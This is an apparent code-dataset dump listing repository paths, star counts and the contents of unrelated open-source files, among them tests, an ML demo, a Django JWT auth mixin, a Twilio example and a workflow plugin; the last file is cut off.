max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/r/test_intqrt.py | hajime9652/observations | 199 | 11089058 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.intqrt import intqrt
def test_intqrt():
"""Test module intqrt.py by downloading
intqrt.csv and testing shape of
extracted data has 124 rows and 23 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = intqrt(test_path)
try:
assert x_train.shape == (124, 23)
except:
shutil.rmtree(test_path)
raise()
|
test/964-default-iface-init-generated/util-src/generate_java.py | lifansama/xposed_art_n | 234 | 11089099 | #!/usr/bin/python3
#
# Copyright (C) 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Generate java test files for test 964.
"""
import os
import sys
from pathlib import Path
BUILD_TOP = os.getenv("ANDROID_BUILD_TOP")
if BUILD_TOP is None:
print("ANDROID_BUILD_TOP not set. Please run build/envsetup.sh", file=sys.stderr)
sys.exit(1)
# Allow us to import utils and mixins.
sys.path.append(str(Path(BUILD_TOP)/"art"/"test"/"utils"/"python"))
from testgen.utils import get_copyright, subtree_sizes, gensym, filter_blanks
import testgen.mixins as mixins
from functools import total_ordering
import itertools
import string
# The max depth the tree can have.
MAX_IFACE_DEPTH = 3
class MainClass(mixins.DumpMixin, mixins.Named, mixins.JavaFileMixin):
"""
A Main.java file containing the Main class and the main function. It will run
all the test functions we have.
"""
MAIN_CLASS_TEMPLATE = """{copyright}
class Main {{
{test_groups}
{main_func}
}}
"""
MAIN_FUNCTION_TEMPLATE = """
public static void main(String[] args) {{
{test_group_invoke}
}}
"""
TEST_GROUP_INVOKE_TEMPLATE = """
{test_name}();
"""
def __init__(self):
"""
Initialize this MainClass. We start out with no tests.
"""
self.tests = set()
def add_test(self, ty):
"""
Add a test for the concrete type 'ty'
"""
self.tests.add(Func(ty))
def get_expected(self):
"""
Get the expected output of this test.
"""
all_tests = sorted(self.tests)
return filter_blanks("\n".join(a.get_expected() for a in all_tests))
def get_name(self):
"""
Gets the name of this class
"""
return "Main"
def __str__(self):
"""
Print the java code for this test.
"""
all_tests = sorted(self.tests)
test_invoke = ""
test_groups = ""
for t in all_tests:
test_groups += str(t)
for t in all_tests:
test_invoke += self.TEST_GROUP_INVOKE_TEMPLATE.format(test_name=t.get_name())
main_func = self.MAIN_FUNCTION_TEMPLATE.format(test_group_invoke=test_invoke)
return self.MAIN_CLASS_TEMPLATE.format(copyright = get_copyright('java'),
test_groups = test_groups,
main_func = main_func)
class Func(mixins.Named, mixins.NameComparableMixin):
"""
A function that tests the functionality of a concrete type. Should only be
constructed by MainClass.add_test.
"""
TEST_FUNCTION_TEMPLATE = """
public static void {fname}() {{
try {{
System.out.println("About to initialize {tree}");
{farg} v = new {farg}();
System.out.println("Initialized {tree}");
v.touchAll();
System.out.println("All of {tree} hierarchy initialized");
return;
}} catch (Error e) {{
e.printStackTrace(System.out);
return;
}}
}}
"""
OUTPUT_FORMAT = """
About to initialize {tree}
{initialize_output}
Initialized {tree}
{touch_output}
All of {tree} hierarchy initialized
""".strip()
def __init__(self, farg):
"""
Initialize a test function for the given argument
"""
self.farg = farg
def __str__(self):
"""
Print the java code for this test function.
"""
return self.TEST_FUNCTION_TEMPLATE.format(fname=self.get_name(),
farg=self.farg.get_name(),
tree = self.farg.get_tree())
def get_name(self):
"""
Gets the name of this test function
"""
return "TEST_FUNC_{}".format(self.farg.get_name())
def get_expected(self):
"""
Get the expected output of this function.
"""
return self.OUTPUT_FORMAT.format(
tree = self.farg.get_tree(),
initialize_output = self.farg.get_initialize_output().strip(),
touch_output = self.farg.get_touch_output().strip())
class TestClass(mixins.DumpMixin, mixins.Named, mixins.NameComparableMixin, mixins.JavaFileMixin):
"""
A class that will be instantiated to test interface initialization order.
"""
TEST_CLASS_TEMPLATE = """{copyright}
public class {class_name} implements {ifaces} {{
public void marker() {{
return;
}}
public void touchAll() {{
{touch_calls}
}}
}}
"""
TOUCH_CALL_TEMPLATE = """
System.out.println("{class_name} touching {iface_name}");
{iface_name}.field.touch();
"""
TOUCH_OUTPUT_TEMPLATE = """
{class_name} touching {iface_name}
{touch_output}
""".strip()
def __init__(self, ifaces):
"""
Initialize this test class which implements the given interfaces
"""
self.ifaces = ifaces
self.class_name = "CLASS_"+gensym()
def get_name(self):
"""
Gets the name of this interface
"""
return self.class_name
def get_tree(self):
"""
Print out a representation of the type tree of this class
"""
return "[{fname} {iftree}]".format(fname = self.get_name(), iftree = print_tree(self.ifaces))
def get_initialize_output(self):
return "\n".join(map(lambda i: i.get_initialize_output().strip(), dump_tree(self.ifaces)))
def get_touch_output(self):
return "\n".join(map(lambda a: self.TOUCH_OUTPUT_TEMPLATE.format(
class_name = self.class_name,
iface_name = a.get_name(),
touch_output = a.get_touch_output()).strip(),
self.get_all_interfaces()))
def get_all_interfaces(self):
"""
Returns a set of all interfaces this class transitively implements
"""
return sorted(set(dump_tree(self.ifaces)))
def __str__(self):
"""
Print the java code for this class.
"""
j_ifaces = ', '.join(map(lambda a: a.get_name(), self.ifaces))
touches = '\n'.join(map(lambda a: self.TOUCH_CALL_TEMPLATE.format(class_name = self.class_name,
iface_name = a.get_name()),
self.get_all_interfaces()))
return self.TEST_CLASS_TEMPLATE.format(copyright = get_copyright('java'),
ifaces = j_ifaces,
class_name = self.class_name,
touch_calls = touches)
class TestInterface(mixins.DumpMixin, mixins.Named, mixins.NameComparableMixin, mixins.JavaFileMixin):
"""
An interface that will be used to test default method resolution order.
"""
TEST_INTERFACE_TEMPLATE = """{copyright}
public interface {class_name} {extends} {ifaces} {{
public static final Displayer field = new Displayer("{tree}");
public void marker();
{funcs}
}}
"""
DEFAULT_FUNC_TEMPLATE = """
public default void {class_name}_DEFAULT_FUNC() {{ return; }}
"""
OUTPUT_TEMPLATE = "initialization of {tree}"
def __init__(self, ifaces, default):
"""
Initialize interface with the given super-interfaces
"""
self.ifaces = ifaces
self.default = default
end = "_DEFAULT" if default else ""
self.class_name = "INTERFACE_"+gensym()+end
self.cloned = False
self.initialized = False
def clone(self):
"""
Clones this interface, returning a new one with the same structure but
different name.
"""
return TestInterface(tuple(map(lambda a: a.clone(), self.ifaces)), self.default)
def get_name(self):
"""
Gets the name of this interface
"""
return self.class_name
def __iter__(self):
"""
Performs depth-first traversal of the interface tree this interface is the
root of. Does not filter out repeats.
"""
for i in self.ifaces:
yield i
yield from i
def get_tree(self):
"""
Print out a representation of the type tree of this class
"""
return "[{class_name} {iftree}]".format(class_name = self.get_name(),
iftree = print_tree(self.ifaces))
def get_initialize_output(self):
"""
Returns the expected output upon the class that implements this interface being initialized.
"""
if self.default and not self.initialized:
self.initialized = True
return self.OUTPUT_TEMPLATE.format(tree = self.get_tree())
else:
return ""
def get_touch_output(self):
"""
Returns the expected output upon this interface being touched.
"""
if not self.default and not self.initialized:
self.initialized = True
return self.OUTPUT_TEMPLATE.format(tree = self.get_tree())
else:
return ""
def __str__(self):
"""
Print the java code for this interface.
"""
j_ifaces = ', '.join(map(lambda a: a.get_name(), self.ifaces))
if self.default:
funcs = self.DEFAULT_FUNC_TEMPLATE.format(class_name = self.class_name)
else:
funcs = ""
return self.TEST_INTERFACE_TEMPLATE.format(copyright = get_copyright('java'),
extends = "extends" if len(self.ifaces) else "",
ifaces = j_ifaces,
funcs = funcs,
tree = self.get_tree(),
class_name = self.class_name)
def dump_tree(ifaces):
"""
Yields all the interfaces transitively implemented by the set in
reverse-depth-first order
"""
for i in ifaces:
yield from dump_tree(i.ifaces)
yield i
def print_tree(ifaces):
"""
Prints the tree for the given ifaces.
"""
return " ".join(i.get_tree() for i in ifaces)
def clone_all(l):
return tuple(a.clone() for a in l)
# Cached output of subtree_sizes for speed of access.
SUBTREES = [set(tuple(l) for l in subtree_sizes(i))
for i in range(MAX_IFACE_DEPTH + 1)]
def create_test_classes():
"""
Yield all the test classes with the different interface trees
"""
for num in range(1, MAX_IFACE_DEPTH + 1):
for split in SUBTREES[num]:
ifaces = []
for sub in split:
ifaces.append(list(create_interface_trees(sub)))
for supers in itertools.product(*ifaces):
yield TestClass(clone_all(supers))
for i in range(len(set(dump_tree(supers)) - set(supers))):
ns = clone_all(supers)
selected = sorted(set(dump_tree(ns)) - set(ns))[i]
yield TestClass(tuple([selected] + list(ns)))
def create_interface_trees(num):
"""
Yield all the interface trees up to 'num' depth.
"""
if num == 0:
yield TestInterface(tuple(), False)
yield TestInterface(tuple(), True)
return
for split in SUBTREES[num]:
ifaces = []
for sub in split:
ifaces.append(list(create_interface_trees(sub)))
for supers in itertools.product(*ifaces):
yield TestInterface(clone_all(supers), False)
yield TestInterface(clone_all(supers), True)
# TODO Should add on some from higher up the tree.
def create_all_test_files():
"""
Creates all the objects representing the files in this test. They just need to
be dumped.
"""
mc = MainClass()
classes = {mc}
for clazz in create_test_classes():
classes.add(clazz)
for i in dump_tree(clazz.ifaces):
classes.add(i)
mc.add_test(clazz)
return mc, classes
def main(argv):
java_dir = Path(argv[1])
if not java_dir.exists() or not java_dir.is_dir():
print("{} is not a valid java dir".format(java_dir), file=sys.stderr)
sys.exit(1)
expected_txt = Path(argv[2])
mainclass, all_files = create_all_test_files()
with expected_txt.open('w') as out:
print(mainclass.get_expected(), file=out)
for f in all_files:
f.dump(java_dir)
if __name__ == '__main__':
main(sys.argv)
|
examples/books_to_scrape/persistence/__init__.py | awesome-archive/transistor | 232 | 11089111 | # -*- coding: utf-8 -*-
"""
transistor.examples.books_to_scrape.persistence
~~~~~~~~~~~~
This module serves as an example of how to setup a persistence model for Transistor
with postgresql + newt.db.
:copyright: Copyright (C) 2018 by BOM Quote Limited
:license: The MIT License, see LICENSE for more details.
~~~~~~~~~~~~
"""
from .serialization import BookItems, BookItemsLoader
from .newt_db import ndb |
qinhaifang/src/tools/demo_seg_mss.py | SpaceNetChallenge/BuildingFootprintDetectors | 161 | 11089191 | <reponame>SpaceNetChallenge/BuildingFootprintDetectors<filename>qinhaifang/src/tools/demo_seg_mss.py
#!/usr/bin/python
# --------------------------------------------------------
# Multitask Network Cascade
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# Copyright (c) 2016, <NAME>
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# Standard module
import os
import shutil
import argparse
import time
import cv2
import numpy as np
# User-defined module
import _init_paths
import caffe
from mnc_config import cfg
from transform.bbox_transform import clip_boxes
from utils.blob import prep_im_for_blob, im_list_to_blob,im_list_to_blob_mss
from transform.mask_transform import gpu_mask_voting
#import matplotlib.pyplot as plt
from utils.vis_seg import _convert_pred_to_image, _get_voc_color_map
from PIL import Image
from osgeo import gdal
# spaceNet classes
CLASSES = ('building')
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='MNC demo')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default='./models/VGG16/mnc_5stage/test_maskSeg.prototxt', type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default='./vgg16_mnc_instanceSeg_iter_2000.caffemodel', type=str)
parser.add_argument('--datapath', dest='data_path',
help='path to save testdata',
default=cfg.ROOT_DIR +'/data/VOCdevkitSDS', type=str)
parser.add_argument('--respath', dest='res_path',
help='path to save test results',
default=cfg.ROOT_DIR +'/test_reuslts', type=str)
args = parser.parse_args()
return args
def prepare_mnc_args(im, im_mss, net):
# Prepare image data blob
blobs = {'data': None}
processed_ims = []
im, im_scale_factors = \
prep_im_for_blob(im, cfg.PIXEL_MEANS, cfg.TEST.SCALES[0], cfg.TRAIN.MAX_SIZE)
im_mss_data = im_mss.ReadAsArray()
im_mss_data = np.transpose(im_mss_data,(1,2,0))
blobs['data'] = im_list_to_blob_mss(im,im_mss_data)
# Prepare image info blob
im_scales = [np.array(im_scale_factors)]
assert len(im_scales) == 1, 'Only single-image batch implemented'
im_blob = blobs['data']
blobs['im_info'] = np.array(
[[im_blob.shape[2], im_blob.shape[3], im_scales[0]]],
dtype=np.float32)
# Reshape network inputs and do forward
net.blobs['data'].reshape(*blobs['data'].shape)
net.blobs['im_info'].reshape(*blobs['im_info'].shape)
forward_kwargs = {
'data': blobs['data'].astype(np.float32, copy=False),
'im_info': blobs['im_info'].astype(np.float32, copy=False)
}
return forward_kwargs, im_scales
def im_detect(im, im_mss, net):
forward_kwargs, im_scales = prepare_mnc_args(im, im_mss, net)
blobs_out = net.forward(**forward_kwargs)
# output we need to collect:
# 1. output from phase1'
rois_phase1 = net.blobs['rois'].data.copy()
#print 'rois_phase1:{}'.format(rois_phase1.shape)
masks_phase1 = net.blobs['mask_proposal'].data[...]
scores_phase1 = net.blobs['seg_cls_prob'].data[...]
# 2. output from phase2
'''
rois_phase2 = net.blobs['rois_ext'].data[...]
masks_phase2 = net.blobs['mask_proposal_ext'].data[...]
scores_phase2 = net.blobs['seg_cls_prob_ext'].data[...]
'''
# Boxes are in resized space, we un-scale them back
rois_phase1 = rois_phase1[:, 1:5] / im_scales[0]
rois_phase1, _ = clip_boxes(rois_phase1, im.shape)
masks = masks_phase1
boxes = rois_phase1
scores = scores_phase1
return boxes, masks, scores
def get_vis_dict(result_box, result_mask, img_name, cls_names, vis_thresh=0.3):
box_for_img = []
mask_for_img = []
cls_for_img = []
for cls_ind, cls_name in enumerate(cls_names):
det_for_img = result_box[cls_ind]
seg_for_img = result_mask[cls_ind]
#print 'det_for_img:{}'.format(det_for_img[:,-1])
keep_inds = np.where(det_for_img[:, -1] >= vis_thresh)[0]
for keep in keep_inds:
box_for_img.append(det_for_img[keep])
mask_for_img.append(seg_for_img[keep][0])
cls_for_img.append(cls_ind + 1)
res_dict = {'image_name': img_name,
'cls_name': cls_for_img,
'boxes': box_for_img,
'masks': mask_for_img}
return res_dict
if __name__ == '__main__':
args = parse_args()
test_prototxt = args.prototxt
test_model = args.caffemodel
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
net = caffe.Net(test_prototxt, test_model, caffe.TEST)
# _, _, _ = im_detect(im, net)
im_file = open(os.path.join(args.data_path,'val.txt'),'r')
im_names = im_file.readlines()
data_path = os.path.join(args.data_path,'img')
data_path_mss = os.path.join(args.data_path,'img_8band')
res_path = args.res_path
if os.path.isdir(res_path):
shutil.rmtree(res_path)
os.mkdir(res_path)
for img_name in im_names:
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
img_name = img_name.strip()
im_name = os.path.join(img_name + '.tif')
im_name_mss = '8' + im_name[1::]
print 'Demo for data/demo/{}'.format(im_name)
print os.path.join(data_path,im_name)
gt_image = os.path.join(data_path, im_name)
im = cv2.imread(gt_image)
im_mss = gdal.Open(os.path.join(data_path_mss,im_name_mss))
start = time.time()
boxes, masks, seg_scores = im_detect(im, im_mss, net)
print 'boxes{},masks{},seg_scores{}'.format(boxes.shape,masks.shape,seg_scores.shape)
print 'boxes{}'.format(boxes.shape)
end = time.time()
print 'forward time %f' % (end-start)
result_mask, result_box = gpu_mask_voting(masks, boxes, seg_scores, len(CLASSES) + 1,
300, im.shape[1], im.shape[0])
pred_dict = get_vis_dict(result_box, result_mask, data_path + im_name, CLASSES)
img_width = im.shape[1]
img_height = im.shape[0]
inst_img, cls_img = _convert_pred_to_image(img_width, img_height, pred_dict)
color_map = _get_voc_color_map()
target_cls_file = os.path.join(res_path, 'cls_maskSeg_' + img_name +'.jpg')
cls_out_img = np.zeros((img_height, img_width, 3))
for i in xrange(img_height):
for j in xrange(img_width):
cls_out_img[i][j] = color_map[cls_img[i][j]][::-1]
cv2.imwrite(target_cls_file, cls_out_img)
background = Image.open(gt_image)
#boxx = (0,0,200,200)
#background = background.crop(boxx)
mask = Image.open(target_cls_file)
background = background.convert('RGBA')
mask = mask.convert('RGBA')
superimpose_image = Image.blend(background, mask, 0.4)
superimpose_name = os.path.join(res_path, 'final_maskSeg_' + img_name + '.jpg')
superimpose_image.save(superimpose_name, 'JPEG')
print superimpose_name
|
examples/dataflow-production-ready/python/ml_preproc/pipeline/model/data_classes.py | ruchirjain86/professional-services | 2,116 | 11089198 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
from typing import Iterable
# to use it to filter out the header of the CSV file.
HEADER = 'source_address;source_city;target_address;target_city'
# Here we return field names that are not duplicated and can be used with a named tuple.
def _input_fields(header: str, sep: str = ";"):
return header.split(sep)
# Because writing a data class is boring, named tuples just make it much easier
Record = namedtuple('Record', _input_fields(HEADER))
def line2record(line: str, sep: str = ";") -> Iterable[Record]:
""" Transform a line of data into a Record.
Args:
line: A line from the CSV data file
sep: The separator used in the line. Default is ;
Returns:
object:
A Record object
"""
elements = line.split(sep)
return Record(*elements) |
test/models/tensorflow/frozen_op_graph/tf_frozen.py | lynex/nnfusion | 639 | 11089214 | <reponame>lynex/nnfusion
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import tensorflow as tf
import numpy as np
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
tf.reset_default_graph()
# input tensor
x0 = tf.placeholder(tf.float32, shape=[1, 3, 2, 2])
x1 = tf.placeholder(tf.float32, shape=[3, 3, 2, 1])
y = tf.nn.depthwise_conv2d(x0, x1, strides=[1,1,1,1], padding='SAME', name='depthwise_conv2d')
with tf.Session() as s:
resdata = s.run(y, feed_dict={x0:[[[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]], x1:[[[[1], [2]], [[7], [8]], [[13], [14]]], [[[3], [4]], [[9], [10]], [[15], [16]]], [[[5], [6]], [[11], [12]], [[17], [18]]]]})
print("result=", list(resdata))
g = s.graph
g_def = g.as_graph_def()
g_def_const = graph_util.convert_variables_to_constants(input_graph_def=g_def, output_node_names=["depthwise_conv2d"], sess=s)
graph_io.write_graph(as_text=False, name="depthwise_conv2d.pb", logdir="./",graph_or_graph_def=g_def_const)
|
jwt_auth/mixins.py | sundeepkumar/django-jwt-auth-master | 175 | 11089225 | from django.http import HttpResponse
import jwt
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from jwt_auth import settings, exceptions
from jwt_auth.utils import get_authorization_header
from jwt_auth.compat import json, smart_text, User
jwt_decode_handler = settings.JWT_DECODE_HANDLER
jwt_get_user_id_from_payload = settings.JWT_PAYLOAD_GET_USER_ID_HANDLER
class JSONWebTokenAuthMixin(object):
"""
Token based authentication using the JSON Web Token standard.
Clients should authenticate by passing the token key in the "Authorization"
HTTP header, prepended with the string specified in the setting
`JWT_AUTH_HEADER_PREFIX`. For example:
Authorization: JWT <KEY>
"""
www_authenticate_realm = 'api'
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
try:
request.user, request.token = self.authenticate(request)
except exceptions.AuthenticationFailed as e:
response = HttpResponse(
json.dumps({'errors': [str(e)]}),
status=401,
content_type='application/json'
)
response['WWW-Authenticate'] = self.authenticate_header(request)
return response
return super(JSONWebTokenAuthMixin, self).dispatch(
request, *args, **kwargs)
def authenticate(self, request):
auth = get_authorization_header(request).split()
auth_header_prefix = settings.JWT_AUTH_HEADER_PREFIX.lower()
if not auth or smart_text(auth[0].lower()) != auth_header_prefix:
raise exceptions.AuthenticationFailed()
if len(auth) == 1:
msg = 'Invalid Authorization header. No credentials provided.'
raise exceptions.AuthenticationFailed(msg)
elif len(auth) > 2:
msg = ('Invalid Authorization header. Credentials string '
'should not contain spaces.')
raise exceptions.AuthenticationFailed(msg)
try:
payload = jwt_decode_handler(auth[1])
except jwt.ExpiredSignature:
msg = 'Signature has expired.'
raise exceptions.AuthenticationFailed(msg)
except jwt.DecodeError:
msg = 'Error decoding signature.'
raise exceptions.AuthenticationFailed(msg)
user = self.authenticate_credentials(payload)
return (user, auth[1])
def authenticate_credentials(self, payload):
"""
Returns an active user that matches the payload's user id and email.
"""
try:
user_id = jwt_get_user_id_from_payload(payload)
if user_id:
user = User.objects.get(pk=user_id, is_active=True)
else:
msg = 'Invalid payload'
raise exceptions.AuthenticationFailed(msg)
except User.DoesNotExist:
msg = 'Invalid signature'
raise exceptions.AuthenticationFailed(msg)
return user
def authenticate_header(self, request):
"""
Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return 'JWT realm="{0}"'.format(self.www_authenticate_realm)
|
hypergan/layers/pixel_shuffle.py | limberc/HyperGAN | 889 | 11089235 | <filename>hypergan/layers/pixel_shuffle.py
import torch.nn as nn
from hypergan.layer_shape import LayerShape
import hypergan as hg
class PixelShuffle(hg.Layer):
"""
---
description: 'layer pixel_shuffle for configurable component'
---
# pixel_shuffle layer
Implements PixelShuffle https://pytorch.org/docs/master/generated/torch.nn.PixelShuffle.html
## input size
Any 4-d tensor of the form `[B, C, H, W]`
## output size
A 4d-tensor of the form `[B, C//4, H*2, W*2]`
## syntax
```json
"pixel_shuffle"
```
"""
def __init__(self, component, args, options):
super(PixelShuffle, self).__init__(component, args, options)
self.shuffle = nn.PixelShuffle(2)
self.dims = list(component.current_size.dims).copy()
def output_size(self):
return LayerShape(self.dims[0]//4, self.dims[1]*2, self.dims[2]*2)
def forward(self, input, context):
return self.shuffle(input)
|
rest/subaccounts/voice-example/subaccount-call.6.x.py | Tshisuaka/api-snippets | 234 | 11089262 | # Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
sub_account_sid = os.environ['TWILIO_ACCOUNT_SID']
sub_auth_token = os.environ['TWILIO_AUTH_TOKEN']
sub_account_client = Client(sub_account_sid, sub_auth_token)
url = 'http://twimlets.com/message?' + \
'Message%5B0%5D=Hello%20from%20your%20subaccount'
# Make a call from your subaccount
sub_account_client.api.account.calls.create(
from_='+14158141829', to='+16518675310', url=url
)
|
mmseg/core/seg/sampler/__init__.py | HeqingZhang/mmsegmentation | 903 | 11089273 | from .base_pixel_sampler import BasePixelSampler
from .ohem_pixel_sampler import OHEMPixelSampler
__all__ = ['BasePixelSampler', 'OHEMPixelSampler']
|
src/dispatch/plugins/generic_workflow/plugin.py | axellaurelut/dispatch | 3,417 | 11089285 | <gh_stars>1000+
"""
.. module: dispatch.plugins.generic_workflow.plugin
:platform: Unix
:copyright: (c) 2021 by <NAME>.
:license: MIT, see LICENSE for more details.
:description:
The rest API needs to respond with JSON according to the JSON schema mentioned here
https://github.com/Netflix/dispatch/issues/1722#issuecomment-947863678
For example:
{
"status": "Completed", # String<Running, Completed, Failed>
"artifacts": [{
"evergreen": False,
"evergreen_owner": None,
"evergreen_reminder_interval": 90,
"evergreen_last_reminder_at": None,
"resource_type": None,
"resource_id": None,
"weblink": "https://www.example.com",
"description": "Description",
"name": "Logfile20211020",
"created_at": "2021-10-20 20:50:00",
"updated_at": "2021-10-20 20:50:00"
}],
"weblink": "https://www.twitter.com", #String<WorkflowURL>,
}
"""
import logging
import requests
import json
from pydantic import Field, SecretStr, HttpUrl
from tenacity import TryAgain, retry, stop_after_attempt, wait_exponential
from dispatch.config import BaseConfigurationModel
from dispatch.decorators import apply, counter, timer
from dispatch.plugins import generic_workflow as generic_workflow_plugin
from dispatch.plugins.bases import WorkflowPlugin
class GenericWorkflowConfiguration(BaseConfigurationModel):
"""
Generic Workflow configuration
You can enter an REST API endpoint here that gets called when a workflow needs to either run or return its status.
Run results in a POST request with a JSON payload containing workflow_id and params.
Getting the status of the workflow is called as a GET request with the following GET query string parameters:
workflow_id, workflow_instance_id, incident_id and incident_name.
"""
api_url: HttpUrl = Field(
title="API URL", description="This API endpoint to GET or POST workflow info from/to."
)
auth_header: SecretStr = Field(
title="Authorization Header",
description="For example: Bearer: JWT token, or basic: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
@apply(counter, exclude=["__init__"])
@apply(timer, exclude=["__init__"])
class GenericWorkflowPlugin(WorkflowPlugin):
title = "Generic Workflow Plugin - Workflow Management"
slug = "generic-workflow"
description = "A generic workflow plugin that calls an API endpoint to kick-off a workflow and retrieve the status of a workflow."
version = generic_workflow_plugin.__version__
author = "<NAME>"
author_url = "https://github.com/jtorvald/"
def __init__(self):
WorkflowPlugin.__init__(self)
self.configuration_schema = GenericWorkflowConfiguration
@retry(stop=stop_after_attempt(3), wait=wait_exponential(multiplier=1, min=1, max=10))
def get_workflow_instance(
self,
workflow_id: str,
workflow_instance_id: int,
incident_id: int,
incident_name: str,
**kwargs,
):
api_url = self.configuration.api_url
headers = {
"Content-Type": "application/json",
"Authorization": self.configuration.auth_header.get_secret_value(),
}
fields = {
"workflow_id": workflow_id,
"workflow_instance_id": workflow_instance_id,
"incident_id": incident_id,
"incident_name": incident_name,
}
resp = requests.get(api_url, params=fields, headers=headers)
if resp.status_code in [429, 500, 502, 503, 504]:
raise TryAgain
return resp.json()
@retry(stop=stop_after_attempt(3), wait=wait_exponential(multiplier=1, min=1, max=10))
def run(self, workflow_id: str, params: dict, **kwargs):
logging.info("Run on generic workflow %s, %s", params, kwargs)
api_url = self.configuration.api_url
obj = {"workflow_id": workflow_id, "params": params}
headers = {
"Content-Type": "application/json",
"Authorization": self.configuration.auth_header.get_secret_value(),
}
resp = requests.post(api_url, data=json.dumps(obj), headers=headers)
if resp.status_code in [429, 500, 502, 503, 504]:
raise TryAgain
return resp.json()
|
src/data/osm/street_loader.py | grischard/OSMDeepOD | 156 | 11089298 | import logging
from src.base.node import Node
from src.base.street import Street
from src.base.tag import Tag
from src.data.osm.overpass_api import OverpassApi
logger = logging.getLogger(__name__)
class StreetLoader:
street_categories = [
'road',
'trunk',
'primary',
'secondary',
'tertiary',
'unclassified',
'residential',
'service',
'trunk_link',
'primary_link',
'secondary_link',
'tertiary_link',
'pedestrian']
def __init__(self, categories=None):
self.api = OverpassApi()
self._add([] if categories is None else categories)
self.tags = self._generate_tags()
def load_data(self, bbox):
data = self.api.get(bbox, self.tags)
return self._generate_street(data)
def _add(self, categories):
for category in categories:
self.street_categories.append(category)
def _generate_tags(self):
tags = []
for category in self.street_categories:
tags.append(Tag(key='highway', value=category))
return tags
@staticmethod
def _generate_street(data):
streets = []
for feature in data['features']:
coordinates = feature['geometry']['coordinates']
nodes = []
for coordinate in coordinates:
try:
lat, lon = coordinate[1], coordinate[0]
except TypeError:
logger.exception()
logger.warn("feature was: {}, coordinate was: {}".format(feature, coordinate))
else:
nodes.append(Node(lat, lon))
streets.append(Street(nodes))
return streets
|
torchtext/models/roberta/transforms.py | nateanl/text | 3,172 | 11089378 | import os
import torch
from torch.nn import Module
from torchtext._download_hooks import load_state_dict_from_url
from torchtext import transforms
from torchtext import functional
from typing import List, Any
class XLMRobertaModelTransform(Module):
def __init__(
self,
vocab_path: str,
spm_model_path: str,
bos_token: str = "<s>",
cls_token: str = "<s>",
pad_token: str = "<pad>",
eos_token: str = "</s>",
sep_token: str = "</s>",
unk_token: str = "<unk>",
mask_token: str = "<mask>",
max_seq_len: int = 514,
):
super().__init__()
self.bos_token = bos_token
self.eos_token = eos_token
self.pad_token = pad_token
self.unk_token = unk_token
self.mask_token = mask_token
self.cls_token = cls_token
self.sep_token = sep_token
self.max_seq_len = max_seq_len
self.token_transform = transforms.SentencePieceTokenizer(spm_model_path)
if os.path.exists(vocab_path):
self.vocab = torch.load(vocab_path)
else:
self.vocab = load_state_dict_from_url(vocab_path)
self.vocab_transform = transforms.VocabTransform(self.vocab)
self.pad_idx = self.vocab[self.pad_token]
self.bos_idx = self.vocab[self.bos_token]
self.eos_idx = self.vocab[self.eos_token]
def forward(self, input: Any,
add_bos: bool = True,
add_eos: bool = True,
truncate: bool = True) -> Any:
if torch.jit.isinstance(input, str):
tokens = self.vocab_transform(self.token_transform(input))
if truncate:
tokens = functional.truncate(tokens, self.max_seq_len - 2)
if add_bos:
tokens = functional.add_token(tokens, self.bos_idx)
if add_eos:
tokens = functional.add_token(tokens, self.eos_idx, begin=False)
return tokens
elif torch.jit.isinstance(input, List[str]):
tokens = self.vocab_transform(self.token_transform(input))
if truncate:
tokens = functional.truncate(tokens, self.max_seq_len - 2)
if add_bos:
tokens = functional.add_token(tokens, self.bos_idx)
if add_eos:
tokens = functional.add_token(tokens, self.eos_idx, begin=False)
return tokens
else:
raise TypeError("Input type not supported")
def get_xlmr_transform(vocab_path, spm_model_path, **kwargs) -> XLMRobertaModelTransform:
return XLMRobertaModelTransform(vocab_path, spm_model_path, **kwargs)
|
Python/WxPython/list.py | Gjacquenot/training-material | 115 | 11089394 | <filename>Python/WxPython/list.py
#!/usr/bin/env python
import paramiko
import time
import sys
import wx
import wx.lib.mixins.listctrl as listmix
class AutoWidthListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
